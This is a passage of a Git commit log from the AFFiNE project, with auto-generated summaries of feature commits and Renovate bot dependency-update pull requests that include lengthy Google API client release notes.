Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2025-10-09 04:36:15 +00:00
EYHN 4b3ebd899b feat(ios): update js subscription api (#13678)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

- New Features
- Added on-demand subscription refresh and state retrieval in the iOS
app, enabling up-to-date subscription status and billing information.
- Exposed lightweight runtime APIs to check and update subscription
state for improved account visibility.

- Chores
- Integrated shared GraphQL package and project references to support
subscription operations.
- Updated workspace configuration to include the common GraphQL module
for the iOS app.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-09-30 03:12:51 +00:00
3720 8006812bc0 refactor(editor): new icon picker (#13658)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* In-tree icon picker for Callout blocks (emoji, app icons, images) with
popup UI and editor-wide extension/service.
* Callout toolbar adds background color presets, an icon-picker action,
and a destructive Delete action.

* **Refactor**
* Replaced legacy emoji workflow with icon-based rendering, updated
state, styling, and lifecycle for callouts.

* **Tests**
  * Updated callout E2E to reflect new default icon and picker behavior.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: L-Sun <zover.v@gmail.com>
2025-09-29 11:06:14 +00:00
Rokas e7f76c1737 chore: update mermaid (#13510)
https://github.com/toeverything/AFFiNE/issues/13509

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
  * Upgraded Mermaid dependency to v11.1.0 in the frontend core package.

* **Impact**
* Improved diagram rendering and compatibility with newer Mermaid
syntax.
* Potential performance and security improvements from upstream updates.
  * No UI changes expected; existing diagrams should continue to work.
  * Please verify critical diagram views for any rendering differences.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: L-Sun <zover.v@gmail.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2025-09-26 07:40:42 +00:00
renovate[bot] bf87178c26 chore: bump up @googleapis/androidpublisher version to v31 (#13633)
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs
from Renovate will soon appear from 'Mend'. Learn more
[here](https://redirect.github.com/renovatebot/renovate/discussions/37842).

This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
|
[@googleapis/androidpublisher](https://redirect.github.com/googleapis/google-api-nodejs-client)
| [`^28.0.0` ->
`^31.0.0`](https://renovatebot.com/diffs/npm/@googleapis%2fandroidpublisher/28.0.1/31.0.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@googleapis%2fandroidpublisher/31.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@googleapis%2fandroidpublisher/28.0.1/31.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

---

### Release Notes

<details>
<summary>googleapis/google-api-nodejs-client
(@&#8203;googleapis/androidpublisher)</summary>

###
[`v31.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13100-2024-01-05)

[Compare
Source](https://redirect.github.com/googleapis/google-api-nodejs-client/compare/v30.0.0...v31.0.0)

##### ⚠ BREAKING CHANGES

- **serviceconsumermanagement:** This release has breaking changes.
- **playintegrity:** This release has breaking changes.

##### Features

- **chromepolicy:** update the API
([8429e3c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8429e3c9d69b2b2e02b4b5e4556f0b0b53a27663))
- **chromeuxreport:** update the API
([6d52abb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6d52abb90222775fa364da0903229c4b56d6c72e))
- **customsearch:** update the API
([1169e4c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1169e4c6072c5838d6a746210367e094cf65e9d2))
- **dialogflow:** update the API
([4b1e073](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4b1e0734d9ae8775a64c0cf438cd3f657a2066b4))
- **displayvideo:** update the API
([45b61b5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/45b61b5d20396610af050b54d84e7749467d5a30))
- **oslogin:** update the API
([cfc90e7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cfc90e7c9c9a3598ce397a40b6d5996b134bf1cf))
- **playintegrity:** update the API
([767af5f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/767af5f12e2f9e882df86428449d1a98e0e960a7))
- regenerate index files
([4246fd1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4246fd1c6484dac0d636d48a2dfcbfcbb2668702))
- **serviceconsumermanagement:** update the API
([a68206a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a68206a2112e645b0b5f521b38c2c068d7ba2375))

##### Bug Fixes

- **accesscontextmanager:** update the API
([845c716](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/845c7168e95499c0142a5cf4c368cb6144729019))
- **admin:** update the API
([4664d6b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4664d6bb4c2fbf2751ae3e403359749fe960fc7a))
- **backupdr:** update the API
([19b0192](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/19b019219b696491ea603a8557212b4eee5535c4))
- **calendar:** update the API
([0ca9bbc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0ca9bbc4e4f841c163458e51952cc92d1363f578))
- **cloudbuild:** update the API
([31158a2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/31158a226c1d47bedfd330c25d376a6d48f09b40))
- **cloudidentity:** update the API
([22610b3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/22610b3d15ec8f639ae77785d76e890be521c98f))
- **cloudprofiler:** update the API
([2c5cbc4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2c5cbc4299ab26894388427dbcd837e48f05a43b))
- **cloudtrace:** update the API
([2a811d5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2a811d5fe82adc2795ce7015e5eeae258b11458d))
- **iap:** update the API
([ec596c1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ec596c1b8719938469a31030108b321c8aeb09cc))
- **playdeveloperreporting:** update the API
([7181840](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7181840daf9fd92d06a70b7cb64e45ce9b39671c))
- **servicenetworking:** update the API
([50c7dbd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50c7dbd3231feefdabe77ff8a25f4d66b9b92a3a))
- **spanner:** update the API
([0e40d67](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0e40d674369b7cc93147e1f97186ca7063eeb770))

###
[`v30.0.0`](https://redirect.github.com/googleapis/google-api-nodejs-client/blob/HEAD/CHANGELOG.md#13000-2024-01-03)

##### ⚠ BREAKING CHANGES

- **networksecurity:** This release has breaking changes.
- **metastore:** This release has breaking changes.
- **gmail:** This release has breaking changes.
- **gkehub:** This release has breaking changes.
- **drivelabels:** This release has breaking changes.
- **dialogflow:** This release has breaking changes.
- **datacatalog:** This release has breaking changes.
- **content:** This release has breaking changes.
- **connectors:** This release has breaking changes.
- **cloudbuild:** This release has breaking changes.
- **chat:** This release has breaking changes.
- **batch:** This release has breaking changes.
- **artifactregistry:** This release has breaking changes.
- **aiplatform:** This release has breaking changes.
- **advisorynotifications:** This release has breaking changes.

##### Features

- **accesscontextmanager:** update the API
([26d496e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/26d496e4160db1e7d997333960be8254ff56ea4c))
- **adexchangebuyer2:** update the API
([31c0066](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/31c006606f81a64eb95ec32a82227d9ff4472e79))
- **admin:** update the API
([79ce913](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/79ce9133d7a898632c1061a23575f8a3309b5e10))
- **advisorynotifications:** update the API
([0f44091](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0f440919dd1046ca5d0ea86233513958eed59602))
- **aiplatform:** update the API
([66739ce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/66739ce6244a9936791970333a30eabe9ea379f6))
- **alloydb:** update the API
([590f835](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/590f835773fe627a43a2f76aaa929260fd69955a))
- **analyticsdata:** update the API
([25d0b67](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/25d0b6763ee7fc4bd9e41cd00d11b5910ab2b274))
- **analyticshub:** update the API
([8279edf](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8279edf154450c9994d306fc1b9eb423f18ed7a5))
- **androidpublisher:** update the API
([c6d69a0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c6d69a049d2227ed20fd292c6b6463adcef31d66))
- **artifactregistry:** update the API
([6fda22c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6fda22c4875bb65a8d3aaca4bf3b8a0a5beec127))
- **assuredworkloads:** update the API
([41debeb](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/41debeba5989a6a45043e2249fb02a869f3320bf))
- **backupdr:** update the API
([1018945](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/10189457700ffa9745f4261a3953f21f3e8e12ac))
- **batch:** update the API
([9ef21e0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9ef21e04593fc74206167811071c92c5c033a728))
- **bigquery:** update the API
([f1deeab](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f1deeabbb09f97c56c14a419c24cee371be992ec))
- **blockchainnodeengine:** update the API
([07ac2e7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/07ac2e721d6d2ce87bccc4971423ba0af294d0b1))
- **chat:** update the API
([88428f0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/88428f0d91d6836e07278b399a995c03d88992c8))
- **checks:** update the API
([2d78a72](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2d78a72c71aadc4e1d796df157a759d171618d74))
- **cloudbilling:** update the API
([857a51e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/857a51e47b42f642555ff5ade0e8a39c55059e6e))
- **cloudbuild:** update the API
([ddf4c10](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddf4c10cf4daa732358d589035a1d442f1883da4))
- **cloudchannel:** update the API
([aecac6b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/aecac6be45a12e632acffbdffe530945847ef721))
- **clouddeploy:** update the API
([62d7fd6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/62d7fd607039bc8d95a46d36845dbef6d2657219))
- **cloudfunctions:** update the API
([c5aae9a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c5aae9a7cf970ac973a93d367bfe6bb44af95450))
- **cloudprofiler:** update the API
([2933bff](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2933bff415c872da86b92b6c128a968530c6bfac))
- **cloudsupport:** update the API
([feb88b5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/feb88b5521c4822859f14ccc9217d53347b560ed))
- **composer:** update the API
([53b83d6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/53b83d65b11d54b80aa94f8efaf09e27eace3beb))
- **compute:** update the API
([ffbf00b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ffbf00b1c1dfa03616f3900be03014f20f04c65e))
- **connectors:** update the API
([f433bd6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f433bd628431cd6c340746a6066b55bf27267e42))
- **container:** update the API
([cac432f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/cac432f882b47acbeaeabd02a18c15d34160a589))
- **content:** update the API
([c0dd4c0](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c0dd4c0bc2398f077f3b9a00dcacffa2052f4f38))
- **datacatalog:** update the API
([a939d7e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a939d7eaf290e763657eda597be699c0f52d8773))
- **dataflow:** update the API
([9721cda](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9721cda955b70096a509f7d8984b317ef5ba1a1d))
- **dataform:** update the API
([d2bfeab](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d2bfeabcbe373953ea36424bfaa99d397a24bcd8))
- **datafusion:** update the API
([413c94e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/413c94e5db50bf95084b1991538cad71b0327a04))
- **dataplex:** update the API
([8da4b12](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8da4b128b1cfbcfd5998f0756e4bc7c3c0c4974e))
- **dataproc:** update the API
([5a60626](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5a606262b3b48769b8c398f4fc306355a4b58373))
- **dialogflow:** update the API
([8829da4](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8829da4a7ee2885ae8b580eed903b2df5526918f))
- **discoveryengine:** update the API
([567c02d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/567c02d28804729e8891e389f51e64cc6ea3baec))
- **dlp:** update the API
([7cbdc6a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7cbdc6aaf4cf23b80085765599259cca5ed28db1))
- **dns:** update the API
([f783244](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f7832440a542bb2699b09e33c618670b88cfc73d))
- **documentai:** update the API
([01cc7b5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/01cc7b599452a3ba52629add7fad7a6a6591ccd9))
- **drivelabels:** update the API
([50a1b75](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/50a1b75751fca09b4e3cc7f58595954ac8c1d85a))
- **drive:** update the API
([c07f193](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c07f193c33f352bf778c6ed68e992fd9c2123abf))
- **file:** update the API
([324d0f6](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/324d0f69b3c3a30200484b2e8fadf4833f804b23))
- **firebaseappcheck:** update the API
([c8fb050](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c8fb050246b60f72597a9f55708b976daf1ae1e6))
- **firebaserules:** update the API
([2a44570](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2a445705f00f8b85a0f7717cd4707c7308953e0a))
- **gkehub:** update the API
([044e086](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/044e0861eda69fa5426aef8643134da2e3510a3c))
- **gkeonprem:** update the API
([6c9398e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6c9398e54ec4e75eb22c58420c81b32880f2b365))
- **gmail:** update the API
([c7698bd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c7698bda1d9a8a034d92a63c27d9af74a416d94b))
- **healthcare:** update the API
([d34ee61](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d34ee618f97d95f61de528f9ada2100a0ba22643))
- **metastore:** update the API
([6887f67](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6887f67506173992f1a6c4df2d5768ca472228a8))
- **migrationcenter:** update the API
([e890439](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e890439ac66117aff0b2edeb7b5dcd20c85b6ead))
- **monitoring:** update the API
([738848d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/738848dcb633a866afd62c42ab749479803906a7))
- **networkmanagement:** update the API
([d8a3556](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d8a35563fc89983bd90576aa84e4c0d8af3b4c5d))
- **networksecurity:** update the API
([166232f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/166232fe1444a4db2eb17f14b12ce85e87fceac8))
- **networkservices:** update the API
([076de17](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/076de17ce5a6588459729c00d6f8fd2de91a9d0c))
- **notebooks:** update the API
([a08d104](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a08d10480099cf544c56c0c4223dd94dfc5632f7))
- **orgpolicy:** update the API
([5c8f8c7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5c8f8c727ca5726b9e833698324eaa36aff29a2b))
- **oslogin:** update the API
([f1475c5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f1475c544fad3f6694f35de1b21fb807f1b71368))
- **paymentsresellersubscription:** update the API
([d79cf5a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d79cf5a6cf6cf1dc2e0fc17f5e376955afafee5b))
- **playdeveloperreporting:** update the API
([6ef5718](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6ef5718e6efba2a56f586fb867d503c958004aaa))
- **policysimulator:** update the API
([58e6545](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/58e654547c4e8f654e38c03aa3404e1f46254126))
- **prod\_tt\_sasportal:** update the API
([99b92fe](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/99b92fe5d94f364f22a9162d85cc4c47548366f2))
- **pubsub:** update the API
([f17fac3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/f17fac34c01770a83a0dbb75aa2b061bb6b5e488))
- **recaptchaenterprise:** update the API
([7952baa](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7952baabbe0e7b268591cb1b5f4e0ad063a53100))
- **recommender:** update the API
([76b9501](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/76b950132771df9ecd733ef8e535a910c8826cc3))
- **redis:** update the API
([fd4636b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/fd4636b1c992ccd668708b55821fa1696231b9b2))
- regenerate index files
([33f2d78](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/33f2d78b2c61a07023d7289278c78130d8e3c7e5))
- **retail:** update the API
([0aa095b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0aa095b51a4ee7be3dde61b0a8653f526f3e73ea))
- **run:** update the API
([48a19bf](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/48a19bf416bb1648a07e7efc4443d5202f6b8be1))
- **sasportal:** update the API
([2459cce](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2459cce1e414ac32977316426351423ef6d23775))
- **script:** update the API
([0520e5e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0520e5efd59cf7fdfcd2c0ba68962c95f194178d))
- **securitycenter:** update the API
([74c634a](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/74c634a34ab01195b5e86f8034c977af13a9fa69))
- **serviceconsumermanagement:** update the API
([0552119](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/05521190feb8bada97478dbbfbe617b3d2060080))
- **servicemanagement:** update the API
([429940b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/429940b1b4955ea05962454ff4132f5fa93cc83d))
- **servicenetworking:** update the API
([42a1422](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/42a142249e172d0e0ec8ab877864a2f0fb385304))
- **serviceusage:** update the API
([c2ad070](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c2ad070ce4e92524177fde0d50038b5bcf4ad562))
- **storage:** update the API
([c0609c9](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/c0609c901b212d5b8a43b9f75099d759a800a4e5))
- **translate:** update the API
([77a0522](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/77a05229d287e07fcad75c7d509cda29d5c41856))
- **vault:** update the API
([db163fd](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/db163fd3b3ea4a71d8108563763f687e7df0262d))
- **vision:** update the API
([77a0a91](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/77a0a9136e5f59f532a9bf064ebed830d10a16d3))
- **vpcaccess:** update the API
([8db5275](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/8db52757e6cc1842f451581340d9fa0aa554fea3))
- **workloadmanager:** update the API
([4c49597](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4c4959752e2d6825bca64aef6694b6f2e4b042e2))
- **workstations:** update the API
([174cd20](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/174cd20129e81ebf20c3e30e77520916e3ef4ae7))

##### Bug Fixes

- **accessapproval:** update the API
([227915d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/227915d92f792529be0b15608cc3f3feaaa5b838))
- **analyticsadmin:** update the API
([b858170](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b858170642a882c05790c2cc4a4f98bf091f159a))
- **androidmanagement:** update the API
([35f8862](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/35f886254c30d0263e981bf49811d7693086559a))
- **apphub:** update the API
([e5a7c92](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e5a7c92a2a50fb4873c72d86ed9448a52e1c3cf6))
- **binaryauthorization:** update the API
([7f20317](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/7f20317264d67cf4cbec409e2eb1c9483349aaa6))
- **calendar:** update the API
([e6ba462](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/e6ba462408d14ae49da8348557c8a5161f7de78f))
- **chromepolicy:** update the API
([a5a5351](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a5a5351998cac8894741ce9461a9af2d71eaea19))
- **classroom:** update the API
([9d2ed12](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9d2ed122022cd591742589f816a8064bf8deadb8))
- **cloudasset:** update the API
([20a91d5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/20a91d5cb69672995e449e04d3c9224db2434fcc))
- **cloudidentity:** update the API
([5155e11](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5155e11cd24367c79c81ec525fffe541c87690d7))
- **cloudkms:** update the API
([90bab2c](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/90bab2c738a3185133a8d98f3e81604375f15464))
- **cloudscheduler:** update the API
([2c7b902](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/2c7b90229a5a25ed0dea8afe5e80cf57de00a167))
- **cloudtasks:** update the API
([a8d66db](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a8d66db0553c0aa069ead02666d083a94e2a01bd))
- **contactcenterinsights:** update the API
([828c5d3](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/828c5d3e0840f6eb9b94b370a4f1037acb93fb30))
- **datamigration:** update the API
([56a65a8](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/56a65a85908a92cc53812ef201b1a672e44a975f))
- **deploymentmanager:** update the API
([b48abef](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b48abef098c1c639c72524121cf39d054ba29587))
- **displayvideo:** update the API
([299cf97](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/299cf97f91a11dbb6cb1358c0e19003e0d7be394))
- **firebaseappdistribution:** update the API
([b102fcc](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b102fccab52fd6fe099b3d1bcb96e7773a74adcf))
- **gkebackup:** update the API
([30ca612](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/30ca6127287a5f55a8c6d7b7247f2aff618e6b8f))
- **iam:** update the API
([4e12124](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/4e121245a3e13e02cb325576f9a9de0f5d49ab98))
- **iap:** update the API
([65c644e](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/65c644e9dedde1b314a854dc39c1028b95921dc5))
- **language:** update the API
([77252e1](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/77252e1b9c209700260742a3884ff628457387f7))
- **logging:** update the API
([1b4dc67](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/1b4dc6732c203844254b20d90e272bdfd4a5c436))
- **mybusinessbusinessinformation:** update the API
([5e4c0fe](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/5e4c0fe0936e6e9b0c56aecbc830e266e1ceb310))
- **places:** update the API
([6bbdf72](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6bbdf72e3e27aad2e65af023a7da508cecf90324))
- **policytroubleshooter:** update the API
([ad18f3b](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ad18f3b0f6304bc0d08e964c1f2b4691eb922568))
- **privateca:** update the API
([b230959](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/b23095912e6c4c4d96b6afbb8536c7c34c84fec6))
- **runtimeconfig:** update the API
([0dfe961](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/0dfe9610eb577576fd5a14aa676b449a13c8f4bc))
- **secretmanager:** update the API
([a202268](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/a202268db9439caab4677db9102c3942e86053f8))
- **servicedirectory:** update the API
([ddc06a2](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ddc06a219b2d2b225fc8219d10030d0f605d791e))
- **sourcerepo:** update the API
([1965102](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/19651026aed9d4a97452b390cbc45b0bc8f97fa9))
- **spanner:** update the API
([ce99980](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/ce99980e717cffd3c2cb50d3fd969c55f20b16b2))
- **sqladmin:** update the API
([de59e8d](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/de59e8dd225ab7cf53698a47b6c5dac578749292))
- **storagetransfer:** update the API
([d6081de](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/d6081dea7de937f0f45f40f6c5cfe62997a7d12e))
- **videointelligence:** update the API
([9d377f5](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/9d377f5e3e7e7a1c062ca3b1e3878ec6828584f0))
- **vmmigration:** update the API
([68a1d5f](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/68a1d5fede479cce01e9543588460cede8f567b0))
- **walletobjects:** update the API
([920ddc7](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/920ddc780c9201ae9c3aa68b1ba535d125797d7a))
- **workflowexecutions:** update the API
([6553987](https://redirect.github.com/googleapis/google-api-nodejs-client/commit/6553987f65508971cd403629752688603faf6b90))

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

<!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0MS45Ny4xMCIsInVwZGF0ZWRJblZlciI6IjQxLjk3LjEwIiwidGFyZ2V0QnJhbmNoIjoiY2FuYXJ5IiwibGFiZWxzIjpbImRlcGVuZGVuY2llcyJdfQ==-->

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
2025-09-26 07:18:12 +00:00
Cats Juice d272c4342d feat(core): replace emoji-mart with affine icon picker (#13644)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

- New Features
  - Unified icon picker with consistent rendering across the app.
  - Picker can auto-close after selection.
  - “Remove” now clears the icon selection.

- Refactor
- Icon handling consolidated across editors, navigation, and document
titles for consistent behavior.
  - Picker now opens on the Emoji panel by default.

- Style
  - Adjusted line-height and selectors for icon picker visuals.

- Chores
  - Removed unused emoji-mart dependencies.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-09-26 06:41:29 +00:00
Cats Juice ca9811792d feat(component): emoji and icon picker (#13638)
![CleanShot 2025-09-23 at 17 11
13](https://github.com/user-attachments/assets/0a4a9d09-1149-4042-bc73-e068a428f335)


<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

- **New Features**
- Icon Picker added with Emoji and Icon panels, search/filtering, recent
selections, color selection, skin tone options, and smooth group
navigation.

- **Documentation**
  - Storybook example added to preview and test the Icon Picker.

- **Chores**
  - Bumped icon library dependency to a newer minor version.
  - Added emoji data dependency to support the Emoji Picker.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2025-09-24 07:14:54 +00:00
Jachin 812c2d86d4 feat(server): add Swagger API docs (#13455)
<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **New Features**
* Interactive API documentation available at /api/docs when running in
development.

* **Chores**
* Added a development dependency to enable generation of the API
documentation.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->

---------

Co-authored-by: DarkSky <25152247+darkskygit@users.noreply.github.com>
Co-authored-by: DarkSky <darksky2048@gmail.com>
2025-09-23 10:31:16 +00:00
renovate[bot] da3e3eb3fa chore: bump up @faker-js/faker version to v10 (#13626)
Coming soon: The Renovate bot (GitHub App) will be renamed to Mend. PRs
from Renovate will soon appear from 'Mend'. Learn more
[here](https://redirect.github.com/renovatebot/renovate/discussions/37842).

This PR contains the following updates:

| Package | Change | Age | Confidence |
|---|---|---|---|
| [@faker-js/faker](https://fakerjs.dev)
([source](https://redirect.github.com/faker-js/faker)) | [`^9.6.0` ->
`^10.0.0`](https://renovatebot.com/diffs/npm/@faker-js%2ffaker/9.8.0/10.0.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@faker-js%2ffaker/10.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@faker-js%2ffaker/9.8.0/10.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
| [@faker-js/faker](https://fakerjs.dev)
([source](https://redirect.github.com/faker-js/faker)) | [`^9.3.0` ->
`^10.0.0`](https://renovatebot.com/diffs/npm/@faker-js%2ffaker/9.8.0/10.0.0)
|
[![age](https://developer.mend.io/api/mc/badges/age/npm/@faker-js%2ffaker/10.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|
[![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@faker-js%2ffaker/9.8.0/10.0.0?slim=true)](https://docs.renovatebot.com/merge-confidence/)
|

---

### Release Notes

<details>
